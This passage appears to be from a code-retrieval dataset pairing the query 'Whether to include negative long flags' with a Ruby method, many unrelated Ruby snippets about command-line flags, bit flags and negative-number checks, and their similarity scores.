"def shorts cols\n decode_values :short, cols, true\n end",
"def set_short(pos=nil,s=nil)\n if pos.class == Fixnum && s.class == Fixnum && !block_given?\n @j_del.java_method(:setShort, [Java::int.java_class,Java::short.java_class]).call(pos,::Vertx::Util::Utils.to_short(s))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling set_short(pos,s)\"\n end",
"def has_unlimited_flags?\n return true if is_approver?\n end",
"def short\n quality + number.to_s \n end",
"def show_onoff(bool)\n if not [TrueClass, FalseClass, NilClass].member?(bool.class)\n return \"??\"\n end\n return bool ? 'on' : 'off'\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def shortenable?(command)\n @alias_hash.each_pair do |alias_, real|\n if used_subcommand?(command, real)\n return true if real.length > alias_.length\n end\n end\n false\n end",
"def flag; end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def tiny\n shorten(4)\n end",
"def flag\n flags.join(\", \")\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def verbose?() @opts.verbose?; end",
"def stability_flags\n alias_of.stability_flags\n end",
"def flags\n FLAGS.find_all{ |k,v| (self.Characteristics & k) != 0 }.map(&:last)\n end",
"def short\n shorten(8)\n end",
"def true_offset\n offset_flags >> 16\n end",
"def debug_request(flag='on', *_)\n case flag.downcase\n when \"off\", \"false\", \"0\", \"nil\"\n @debug = false\n else\n @debug = true\n end\n end",
"def short=(value)\n raise ArgumentError, _(\"Short names can only be one character.\") if value.to_s.length != 1\n @short = value.to_s\n end",
"def has_opts?\n header_len > 20\n end",
"def write_raw_short(val)\n buffer << [val].pack(\"S>\")\n end",
"def group_entry?\n flags.include? :g\n end",
"def switches\n [short, long].map(&:to_s)\n end",
"def underscore_flags?\n config[:underscore_flags]\n end",
"def expandable?\n options[:expandable]\n end",
"def summary\n return desc.to_s.inspect unless desc.empty?\n flags.map(&:display_name).inspect\n end",
"def append_short(s=nil)\n if s.class == Fixnum && !block_given?\n @j_del.java_method(:appendShort, [Java::short.java_class]).call(::Vertx::Util::Utils.to_short(s))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling append_short(s)\"\n end",
"def argument_optional?\n !short.to_s.match(SHORT_ARGUMENT_OPTIONAL_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_OPTIONAL_RE).nil?\n end",
"def single?\n mode == 'single'\n end",
"def verbose?\n !!ENV[\"DEBUG\"]\nend",
"def flagged?\n !(%w(flagged) & flags).empty?\n end",
"def is_flagged?\n return self.flags.unresolved.count > 0\n end",
"def convert_smallint_to_bool\n opts.has_key?(:convert_smallint_to_bool) ? opts[:convert_smallint_to_bool] : db.convert_smallint_to_bool\n end",
"def whitelisted_flags\n flags.select &:allowed\n end",
"def bool_on(word, description = \"\")\n Options[word.to_sym] = false\n on \"-#{word.chars.first}\", \"--[no]#{word}\", description do |o|\n Options[word.to_sym] == o\n end\n end",
"def is_a_short_code?(phone)\n !!phone.to_s.match(/\\A\\d{4,6}\\z/)\n end",
"def typecast_value_boolean(opts={});true;end",
"def active?\n !effective_flags.empty?\n end",
"def short\n # this are short words\n assert PorterStemmer::Porter2.short?(\"bed\")\n assert PorterStemmer::Porter2.short?(\"shed\")\n assert PorterStemmer::Porter2.short?(\"shred\")\n\n # this are not short words\n assert !PorterStemmer::Porter2.short?(\"bead\")\n assert !PorterStemmer::Porter2.short?(\"embed\")\n assert !PorterStemmer::Porter2.short?(\"beds\")\n end",
"def gp_flags; end",
"def get_short\n get(2).unpack('s')\n end",
"def show_full\n @show_full=true\n end",
"def flagged?(flag)\n self.flags.include? flag\n end",
"def shortname?\n !@shortname.nil?\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def is_verbose?\n options.include?(\"-v\")\n end",
"def clamp_short(value)\n mode = Rubinius::Type.coerce_to value, Integer, :to_int\n mode < 0 || mode > 0xffff ? 0 : mode\n end",
"def flags(flags)\n f = \"\"\n if (flags & Sigar::RTF_UP) != 0\n f += \"U\"\n end\n if (flags & Sigar::RTF_GATEWAY) != 0\n f += \"G\"\n end\n if (flags & Sigar::RTF_HOST) != 0\n f += \"H\"\n end\n f\n end",
"def is_elflags?(); @type == GRT_ELFLAGS; end"
] | [
"0.75528914",
"0.71379894",
"0.6998727",
"0.6910547",
"0.6707933",
"0.65746135",
"0.65517926",
"0.6400962",
"0.6104154",
"0.6086827",
"0.607279",
"0.60326034",
"0.60232764",
"0.6019786",
"0.5986978",
"0.5936265",
"0.5927495",
"0.5918958",
"0.58649856",
"0.58321273",
"0.5822369",
"0.58152264",
"0.5803365",
"0.57992584",
"0.5796362",
"0.5776559",
"0.5742714",
"0.57330406",
"0.5727529",
"0.5700044",
"0.5643883",
"0.5642863",
"0.5642863",
"0.56060475",
"0.56033105",
"0.55978864",
"0.55809385",
"0.55439687",
"0.55151916",
"0.5491736",
"0.54866123",
"0.5485344",
"0.54675305",
"0.5463739",
"0.5457115",
"0.5453219",
"0.5447242",
"0.5445686",
"0.54289764",
"0.5422473",
"0.54108757",
"0.54009676",
"0.538027",
"0.53783625",
"0.53713965",
"0.5364755",
"0.535992",
"0.5338828",
"0.53330445",
"0.5329455",
"0.5319651",
"0.5309489",
"0.53086025",
"0.5303656",
"0.52974486",
"0.52968365",
"0.5284759",
"0.52801704",
"0.5274998",
"0.5270863",
"0.52705336",
"0.52672476",
"0.52657175",
"0.5262347",
"0.5255767",
"0.52534884",
"0.5252093",
"0.5251049",
"0.52501327",
"0.5246568",
"0.5244637",
"0.5239361",
"0.5239032",
"0.523274",
"0.5231596",
"0.5230916",
"0.52302426",
"0.5229966",
"0.52196896",
"0.5216919",
"0.5209926",
"0.52040344",
"0.51966035",
"0.51924634",
"0.5178061",
"0.5176484",
"0.51666653",
"0.51633596",
"0.5159315",
"0.5158553"
] | 0.77422243 | 0 |
Whether to include long flags | def include_long?
@include_long
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def flags\n [long, negative_long, short].compact\n end",
"def flags\n [long, short].compact\n end",
"def test_long\n LinuxFortune.long = true\n assert LinuxFortune.long # long should be set to short\n assert LinuxFortune.short == false # short to false\n assert LinuxFortune.fortune_options.include?(\"-l\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 5.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n #puts \"#{lf.body.size} characters\"\n # TODO apparently there is an issue with 'fortune -l'; check fortune docs & bugs (manual mentions a different problem\n assert lf.body.size*1.1 >= LinuxFortune.short_length # check if actual size is greater than the max. short length\n end\n end",
"def long_for_optparse\n (arg and not(long.nil?)) ? (\"%s %s\" % [long, arg]) : long\n end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def get_new_long?\n return self.new_long?\n end",
"def short_flag_syntax\n @short_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :short }\n end",
"def options\n [['--build32', 'Force a 32-bit build.']]\n end",
"def long_opt_symbol(args); end",
"def folly_flags()\n return NewArchitectureHelper.folly_compiler_flags\nend",
"def include_short?\n @include_short\n end",
"def flags; end",
"def flag(short_name, long_name, description, &block)\n\t\t\treturn define_value(short_name, long_name, description, true, false, block)\n\t\tend",
"def long_str # :nodoc:\n long ? Utils.prefix_long(long, '[no-]') : ''\n end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def has_unlimited_flags?\n return true if is_approver?\n end",
"def xlate_flags()\n flags = []\n flags.push('More') if (flag_more?)\n flags.push('Start') if (flag_start?)\n flags.push('Stop') if (flag_stop?)\n flags.push('Watchdog') if (flag_watchdog?)\n return(\"#{flags.join(',')}\") if (flags.length != 0)\n return(\"None\")\n end",
"def test_short\n LinuxFortune.short = true\n assert LinuxFortune.short # short should be set to true\n assert LinuxFortune.long == false # long to false\n assert LinuxFortune.fortune_options.include?(\"-s\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 10.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n assert lf.body.size*0.9 < LinuxFortune.short_length # check if actual size is less than the max. short length\n end\n end",
"def short_flag_exist?(flag)\n flags.select { |f| f.short == flag }.any?\n end",
"def pack_flags(flags)\n FLAGS.each_with_index.inject(0) do |memo,(key,i)|\n memo |= i if flags[key]\n memo\n end\n end",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def default_flags\n cflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n cflags.push '-m64'\n end\n\n cflags\n end",
"def default_flags\n ldflags = []\n\n # GCC on Solaris 10 produces 32-bit code by default, so add -m64\n # when running in 64-bit mode.\n if Platform.is_solaris? and Platform.word_size == 64\n ldflags.push '-m64'\n ldflags.push '-R/usr/sfw/lib/amd64' if Platform.is_x86?\n end\n\n ldflags\n end",
"def complete_flags?\n @complete_flags\n end",
"def complain_about_bad_flags?\n @complain_about_bad_flags\n end",
"def show_elf_flags\n\t\t\t\tputs \" Flags: #{@elf_flags.to_h}\"\n\t\tend",
"def read_long(signed = false, mut = :STD, order = :BIG)\n val = 0\n case order\n when :BIG\n (BYTE_SIZE * 7).downto(0) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div : next }\n val |= read_byte(signed, mut)\n when :LITTLE\n (0).upto(BYTE_SIZE * 7) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div: next }\n val |= read_byte(signed, mut)\n end\n val\n end",
"def long_read_len= fixnum\n #This is a stub, used for indexing\n end",
"def is_elflags?(); @type == GRT_ELFLAGS; end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def read_long; end",
"def flags?\n !@flags.empty?\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def flag_more?()\n return(true) if(@flags & TAC_PLUS_ACCT_FLAG_MORE == TAC_PLUS_ACCT_FLAG_MORE)\n return(false)\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def add_flags(type, flags)\n case type\n when :c\n $CFLAGS << \" #{flags} \"\n when :ld\n $LDFLAGS << \" #{flags} \"\n end\nend",
"def add_flags(type, flags)\n case type\n when :c\n $CFLAGS << \" #{flags} \"\n when :ld\n $LDFLAGS << \" #{flags} \"\n end\nend",
"def short_for_optparse\n (arg and long.nil?) ? (\"%s %s\" % [short, arg]) : short\n end",
"def int64?\n type == INT64_TYPE\n end",
"def flag_more!\n if (!flag_more?)\n @flags = @flags | TAC_PLUS_ACCT_FLAG_MORE\n else\n @flags = @flags & (~TAC_PLUS_ACCT_FLAG_MORE) \n end\n return(nil)\n end",
"def set_64_bit_offset(is_64_bit)\n raise ArgumentError.new, 'The value can only be true or false' unless [true, false].include?(is_64_bit)\n parameter_block.word_count = is_64_bit ? 0x0E : 0x0C\n end",
"def should_use_long_names?\n opts = get_options\n opts['uselongnames']\n end",
"def set_64_bit_offset(is_64_bit)\n raise ArgumentError.new, 'The value can only be true or false' unless [true, false].include?(is_64_bit)\n parameter_block.word_count = is_64_bit ? 0x0C : 0x0A\n end",
"def server_flags; end",
"def build_flags(*flags)\n _flags = *flags\n\n unless _flags.is_a?(Integer)\n _flags = MAGIC_NONE\n\n flags.flatten.each { |flag|\n if value = flag.is_a?(Integer) ? flag : MAGIC_FLAGS[flag.to_sym]\n _flags |= value\n else\n raise ArgumentError, \"#{value.nil? ? 'no such flag' : 'flag not available'}: #{flag}\"\n end\n }\n end\n\n _flags\n end",
"def flag_options\n return @flag_options unless @flag_options.nil?\n @flag_options = ''\n @flag_options << ' --auto-attach' if new_resource.auto_attach\n @flag_options << ' --force' if new_resource.force\n @flag_options << ' --insecure' if new_resource.insecure\n @flag_options\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def lame_flag_map\n { '--tt': :title,\n '--ta': :artist,\n '--tl': :album,\n '--ty': :year,\n '--tn': :t_num,\n '--tg': :genre }\n end",
"def flag\n flags.join(\", \")\n end",
"def has_add\n return @has_add unless @has_add.nil?\n @has_add = (flags & 32768) != 0\n @has_add\n end",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def argument_optional?\n !short.to_s.match(SHORT_ARGUMENT_OPTIONAL_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_OPTIONAL_RE).nil?\n end",
"def short(options = T.unsafe(nil)); end",
"def length_in_long_words\n return @bits.attr_length\n end",
"def flag _args\n \"flag _args;\" \n end",
"def write_long(*n); end",
"def complain_about_bad_flags!\n @complain_about_bad_flags = true\n end",
"def on long,short,desc,type=nil, &b\n t = gt = (type || :none)\n ((gt = \"#{t[0]}_array\") && t=t[0]) if type.is_a?(::Array)\n gt = :\"#{gt.upcase}\"\n \n @map[long] = {block: b, type: gt}\n\n application.add_main_option(long,short,GLib::OptionFlags::NONE,GLib::OptionArg.const_get(gt), desc, type ? t.to_s.upcase : nil) \n end",
"def flags \n @flags ||= {}\n end",
"def found_multiple?\n @flags.size > 1\n end",
"def std_flags\n # FIXME: this is bogus\n m = method(:help_text)\n boolean :help, :flag => \"h\", :doc => \"display this help\"\n boolean :verbose, :flag => \"v\", :doc => \"verbose output\"\n boolean :debug, :flag => \"D\", :doc => \"turn on debugging\"\n end",
"def full?\n flags & 0x2 == 0x2\n end",
"def chained_flags_with_signature(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n truthy_and_chosen =\n selected_flags(colmn).\n select { |flag| flags_to_collect.include?(flag) }\n truthy_and_chosen.concat(\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << \"not_#{flag}\".to_sym unless truthy_and_chosen.include?(flag)\n end\n )\n end",
"def effective_flags\n @effective_flags ||= flag_syntax.flat_map(&:flags)\n end",
"def write_long(file, long, md)\n long = [long].pack('q>')\n md << long\n file.write(long)\n end",
"def flags #:nodoc:\n @flags ||= {}\n end",
"def compute_ext_opts (opts)\n\n r = 0\n r = r | 1 if opts[:record_locking]\n r = r | 2 if opts[:global_locking]\n r\n end",
"def append_ld_flags(flags)\n flags = [flags] unless flags.is_a?(Array)\n with_ldflags(\"#{$LDFLAGS} #{flags.join(' ')}\") { true }\nend",
"def has_opts?\n header_len > 20\n end",
"def other_executable?(mode)\n mode & 00001 == 00001\n end",
"def other_readable?(mode)\n mode & 00004 == 00004\n end",
"def set_long(pos=nil,l=nil)\n if pos.class == Fixnum && l.class == Fixnum && !block_given?\n @j_del.java_method(:setLong, [Java::int.java_class,Java::long.java_class]).call(pos,l)\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling set_long(pos,l)\"\n end",
"def flags\n return @val\n end",
"def xlate_flags()\n flags = []\n flags.push('Single Connection') if (flag_single_connection?)\n flags.push('Unencrypted') if (flag_unencrypted?)\n return(flags.join(', ')) if (flags.length != 0)\n return(\"None\")\n end",
"def flags_before_args_enforced?\n @enforce_flags_before_args\n end",
"def check32_bit_on64_system\n return @check32_bit_on64_system\n end",
"def flags\n input = @flags.clone\n tok = []\n\n # Set the output path\n throw 'Output pathname is required' if @output.nil?\n if Platform.is_windows?\n tok.push \"/OUT:\\\"#{@output}\\\"\"\n tok.push '/DLL' if @output =~ /\\.dll/i\n else\n tok.push '-o', @output\n end\n\n # Enable shared library output\n if @shared_library\n if Platform.is_windows?\n tok.push '/DLL'\n else\n tok.push '-shared'\n tok.push '-fPIC'\n end\n end\n\n # Assume that we want to link with shared libraries\n # built within this project\n unless Platform.is_windows?\n tok.push '-L', '.'\n end\n\n # Override the normal search path for the dynamic linker\n unless @rpath.nil?\n if Platform.is_solaris?\n input.push ['R', @rpath]\n elsif Platform.is_linux?\n input.push ['-rpath', @rpath]\n elsif Platform.is_windows?\n # XXX-FIXME Windows does not support the rpath concept\n else\n throw 'Unsupported OS'\n end\n input.push ['-L', @rpath]\n end\n\n input.each do |f|\n if @gcc_flags == true\n if f.kind_of?(Array)\n if f[0] == '-L'\n tok.push f.join(' ')\n else\n tok.push '-Wl,' + f[0] + ',' + f[1]\n end\n else\n tok.push '-Wl,' + f\n end\n else\n if f.kind_of?(Array)\n tok.push f.flatten.join(' ')\n else\n tok.push f\n end\n end\n end\n\n res = ' ' + tok.join(' ')\n return res\n end",
"def get_long\n get(4).unpack('l')\n end",
"def to_much?(options)\n options.number.to_i > 20\n end",
"def bson_int64?\n (MIN_64BIT <= self) && (self <= MAX_64BIT)\n end",
"def true_offset\n offset_flags >> 16\n end",
"def collect_build_args\n build_flags = []\n\n build_flags << \"--HEAD\" if HEAD?\n build_flags << \"--universal\" if build_universal?\n build_flags << \"--build-bottle\" if build_bottle?\n build_flags << \"--build-from-source\" if build_from_source?\n\n build_flags\n end",
"def very_long_pollution_sources_description?\n bathing_water&.long_pollution_description?(VERY_LONG_DESCRIPTION_LIMIT) &&\n show_prf?\n end",
"def build_flags_cross\n # Unclear if we need config_site CONFIG_SITE=/etc/dpkg-cross/cross-config.i386\n [] << '-a' << cross_arch\n end",
"def flag(*names)\n names = [names].flatten\n verify_unused(names,flags,switches,\"in global options\")\n flag = Flag.new(names,@@next_desc,@@next_arg_name,@@next_default_value,@@next_long_desc)\n flags[flag.name] = flag\n clear_nexts\n end",
"def has_milliseconds?\n self.format(\"%L\").to_i > 0\n end",
"def describe_flags(flags,format)\n d = ''\n flags.keys.each { |f|\n if f=='c' then\n if format=='tex' then f=\"$\\\\int$\" end\n if format=='plain' then f=\"(calculus)\" end\n if format=='html' then f=\"∫\" end\n end\n if f=='s' && format=='tex' then f=\"${}_\\\\textup{s}$\" end\n d=d+f unless f=='o'\n }\n return d\nend",
"def format_boolean_flag(flag, small=false)\n css_small = small == true ? 'boolean-flag-xs' : ''\n if flag == true\n return \"<div class='boolean-flag boolean-flag-true #{css_small}'>#{t('shared.common.yes')}</div>\".html_safe\n else\n return \"<div class='boolean-flag boolean-flag-false #{css_small}'>#{t('shared.common.no')}</div>\".html_safe\n end\n end",
"def flag; end",
"def is_flagged?(feature)\n flags.include?feature\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def scm_flags\n @flags.join(\" \")\n end",
"def short_binary_type; end",
"def flags_resync\n if @flags\n self.class.flag_def.each do |f|\n sym = (f.flag_type=='Symbol' ? f.flag_name.to_sym : f.flag_name)\n i,p,v = self.class.index_position_value(f.position)\n sn=self.send(\"flags_#{i}\")||0\n b = sn & v > 0\n logger.warn \"#{@flags[sym].class} value '#{@flags[sym]}' for flag #{self.class}->#{sym} will be stored as true, not '#{@flags[sym]}'\" unless FlaggableTypes.include?(@flags[sym].class)\n if @flags[sym] && !b\n self.send(\"flags_#{i}=\",sn+v)\n elsif b && !@flags[sym]\n self.send(\"flags_#{i}=\",sn-v)\n end\n end\n end\n @flags\n end",
"def append_long(l=nil)\n if l.class == Fixnum && !block_given?\n @j_del.java_method(:appendLong, [Java::long.java_class]).call(l)\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling append_long(l)\"\n end",
"def argument_required?\n !short.to_s.match(SHORT_ARGUMENT_REQUIRED_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_REQUIRED_RE).nil?\n end",
"def test_stringflag_as_flag\n @p.opt :xyz, \"desc\", :type => :stringflag\n @p.opt :abc, \"desc\", :type => :flag\n opts = @p.parse %w(--xyz )\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal false, opts[:abc]\n opts = @p.parse %w(--xyz --abc)\n assert_equal true, opts[:xyz_given]\n assert_equal true, opts[:xyz]\n assert_equal true, opts[:abc]\n end"
] | [
"0.7245966",
"0.6807072",
"0.66324544",
"0.6364071",
"0.63171667",
"0.5945385",
"0.5848188",
"0.5839984",
"0.5796883",
"0.5730932",
"0.57299966",
"0.5712589",
"0.5686601",
"0.5647302",
"0.5640962",
"0.5616302",
"0.5598856",
"0.5587657",
"0.5584795",
"0.55703974",
"0.55698246",
"0.5500652",
"0.54964143",
"0.5475657",
"0.54638445",
"0.54574966",
"0.54553425",
"0.5454681",
"0.5432492",
"0.5425576",
"0.5404934",
"0.5400269",
"0.537551",
"0.53376216",
"0.5335956",
"0.5335956",
"0.5318401",
"0.5300844",
"0.5297963",
"0.5297963",
"0.5293146",
"0.5292293",
"0.5290225",
"0.52759063",
"0.5269776",
"0.5266675",
"0.52479446",
"0.5246082",
"0.5237311",
"0.5231419",
"0.5223346",
"0.5214367",
"0.52120256",
"0.5209599",
"0.5206147",
"0.51908755",
"0.5167918",
"0.51676214",
"0.5164993",
"0.51416093",
"0.5135795",
"0.5122374",
"0.51182216",
"0.5106318",
"0.50964427",
"0.5086301",
"0.50817555",
"0.5048646",
"0.50435877",
"0.5042795",
"0.5032195",
"0.5029026",
"0.50262016",
"0.50143313",
"0.49900952",
"0.4988057",
"0.4973309",
"0.49720025",
"0.4966722",
"0.49636012",
"0.49589786",
"0.4954308",
"0.49534756",
"0.4952699",
"0.4940554",
"0.49358672",
"0.4933695",
"0.49317908",
"0.49295786",
"0.49252146",
"0.49250853",
"0.49246624",
"0.49218985",
"0.49208254",
"0.4915261",
"0.49147373",
"0.49129903",
"0.4912756",
"0.4895225",
"0.48893264"
] | 0.7485818 | 0 |
Whether to include negative long flags | def include_negative?
@include_negative
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def flags\n [long, negative_long, short].compact\n end",
"def include_long?\n @include_long\n end",
"def flags\n [long, short].compact\n end",
"def long_flag_syntax\n @long_flag_syntax ||= flag_syntax.find_all { |ss| ss.flag_style == :long }\n end",
"def general_purpose_flags\n 0b0000000000000000\n end",
"def general_purpose_flags\n 0b0000000000000001\n end",
"def long_for_optparse\n (arg and not(long.nil?)) ? (\"%s %s\" % [long, arg]) : long\n end",
"def complain_about_bad_flags?\n @complain_about_bad_flags\n end",
"def unique_flag_negative?\n found_unique? ? @flags.first[2] : nil\n end",
"def has_unlimited_flags?\n return true if is_approver?\n end",
"def flags; end",
"def get_flags( options )\n flags = 0\n if options[:flags] then\n if options[:flags].respond_to?(:each) then\n options[:flags].each { |f| flags = flags | f }\n else\n flags = options[:flags]\n end\n end\n return flags\n end",
"def negative?\n !!@negative\n end",
"def complain_about_bad_flags!\n @complain_about_bad_flags = true\n end",
"def negative?; end",
"def argument_optional?\n !short.to_s.match(SHORT_ARGUMENT_OPTIONAL_RE).nil? ||\n !long.to_s.match(LONG_ARGUMENT_OPTIONAL_RE).nil?\n end",
"def report_flags\n self.has_links? ? ret = \"L\" : ret = \"l\"\n self.has_jlinks? ? ret += \"J\" : ret += \"j\"\n self.has_form? ? ret += \"F\" : ret += \"f\"\n self.has_comments? ? ret += \"C\" : ret += \"c\"\n return ret\n end",
"def flag_more!\n if (!flag_more?)\n @flags = @flags | TAC_PLUS_ACCT_FLAG_MORE\n else\n @flags = @flags & (~TAC_PLUS_ACCT_FLAG_MORE) \n end\n return(nil)\n end",
"def neg?\n sign < 0\n end",
"def long_str # :nodoc:\n long ? Utils.prefix_long(long, '[no-]') : ''\n end",
"def flags?\n !@flags.empty?\n end",
"def negative?\n return self < 0\n end",
"def test_long\n LinuxFortune.long = true\n assert LinuxFortune.long # long should be set to short\n assert LinuxFortune.short == false # short to false\n assert LinuxFortune.fortune_options.include?(\"-l\")\n assert LinuxFortune.fortune_options.include?(\"-n\") || LinuxFortune.short_length == 160\n 5.times do # check multiple times if the generated length is ok\n lf = LinuxFortune.generate\n #puts \"#{lf.body.size} characters\"\n # TODO apparently there is an issue with 'fortune -l'; check fortune docs & bugs (manual mentions a different problem\n assert lf.body.size*1.1 >= LinuxFortune.short_length # check if actual size is greater than the max. short length\n end\n end",
"def pack_flags(flags)\n FLAGS.each_with_index.inject(0) do |memo,(key,i)|\n memo |= i if flags[key]\n memo\n end\n end",
"def chained_flags_with_signature(colmn = DEFAULT_COLUMN_NAME, *args)\n flags_to_collect = args.empty? ? all_flags(colmn) : args\n truthy_and_chosen =\n selected_flags(colmn).\n select { |flag| flags_to_collect.include?(flag) }\n truthy_and_chosen.concat(\n collect_flags(*flags_to_collect) do |memo, flag|\n memo << \"not_#{flag}\".to_sym unless truthy_and_chosen.include?(flag)\n end\n )\n end",
"def long_opt_symbol(args); end",
"def negative?\n self < 0\n end",
"def get_new_long?\n return self.new_long?\n end",
"def negative(num)\n return num<0\nend",
"def is_elflags?(); @type == GRT_ELFLAGS; end",
"def negative(num)\n is_neg = false\n if num < 0\n is_neg = true\n end\n return is_neg\nend",
"def negative?\n self < 0\n end",
"def negative?\n @negative\n end",
"def negative?\n @negative\n end",
"def parse_flags(obj, opt, args)\n x = opt.sub(/^-/, '')\n #c = 0\n x.split(//).each do |k|\n #if obj.respond_to?(\"#{k}=\")\n obj.send(\"#{k}=\", true)\n #else\n # obj.option_missing(x, true)\n #end\n end\n end",
"def flags\n @flags\n end",
"def flags\n @flags\n end",
"def flags_before_args_enforced?\n @enforce_flags_before_args\n end",
"def flag _args\n \"flag _args;\" \n end",
"def is_num?\n @flags & NUM_FLAG != 0\n end",
"def is_num?\n @flags & NUM_FLAG != 0\n end",
"def validate_flags\n return if flags == [false, false, false, false]\n\n raise ProtocolException, \"Invalid flags in #{type_name} packet header\"\n end",
"def flag(short_name, long_name, description, &block)\n\t\t\treturn define_value(short_name, long_name, description, true, false, block)\n\t\tend",
"def flag(name,aliases,desc,long_desc,default_value,arg_name,must_match,type)\n abstract!\n end",
"def negative?() @positive==false end",
"def flags\n @values.fetch('flags') { \n @values['flags'] = nil\n }\n end",
"def has_add\n return @has_add unless @has_add.nil?\n @has_add = (flags & 32768) != 0\n @has_add\n end",
"def flag_more?()\n return(true) if(@flags & TAC_PLUS_ACCT_FLAG_MORE == TAC_PLUS_ACCT_FLAG_MORE)\n return(false)\n end",
"def nonnegative?\n return self >= 0\n end",
"def xlate_flags()\n return(\"Abort\") if (flag_abort?)\n return(\"None\")\n end",
"def negative?\n !@positive \n end",
"def is_negative(tal)\n if tal < 0\n return true\n else\n return false\n end\nend",
"def negative_test\r\n @negative = true\r\n end",
"def flag_unencrypted?()\n return(true) if(@flags & TAC_PLUS_UNENCRYPTED_FLAG == TAC_PLUS_UNENCRYPTED_FLAG)\n return(false)\n end",
"def negative? (numb)\n return false if numb > 0\n return true\nend",
"def flags(*args)\n Boxen::Flags.new *args\n end",
"def flags\n return @val\n end",
"def test_do_not_raise_when_int_is_not_wider_than_64bit\n value = 9223372036854775807\n assert_equal \"'9223372036854775807'\", @conn.quote(value)\n\n value = -9223372036854775808\n assert_equal \"'-9223372036854775808'\", @conn.quote(value)\n end",
"def read_long(signed = false, mut = :STD, order = :BIG)\n val = 0\n case order\n when :BIG\n (BYTE_SIZE * 7).downto(0) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div : next }\n val |= read_byte(signed, mut)\n when :LITTLE\n (0).upto(BYTE_SIZE * 7) { |div| ((div % 8).zero? and div.positive?) ? val |= read_byte(signed) << div: next }\n val |= read_byte(signed, mut)\n end\n val\n end",
"def flag_unencrypted!\n if (!flag_unencrypted?)\n @flags = @flags | TAC_PLUS_UNENCRYPTED_FLAG\n else\n @flags = @flags & (~TAC_PLUS_UNENCRYPTED_FLAG)\n end\n return(nil)\n end",
"def test_correct_neg_val_print\n a_parse = Argparser.new\n assert_output(nil) do\n _unused = a_parse.correct?([-20, -5, 0])\n end\n end",
"def modifier_flags(include_shift = true)\n modifiers = self.modifiers.dup\n modifiers.delete(\"S\") unless include_shift\n flags = 0\n modifiers.each { |modifier| flags = flags | MODIFIER_MAP[modifier] }\n flags\n end",
"def true_offset\n offset_flags >> 16\n end",
"def xlate_flags()\n return(\"No Echo\") if (flag_noecho?)\n return(\"None\")\n end",
"def make_flag(options)\n\tflagString=\" \"\n\tif(options.list != nil)\n\t\tflagString+=\" -l\"\n\tend\n\tif(options.all != nil)\n\t\tflagString+= \" -a\"\n\tend\n\treturn flagString\nend",
"def negative?\n self <= 0\n end",
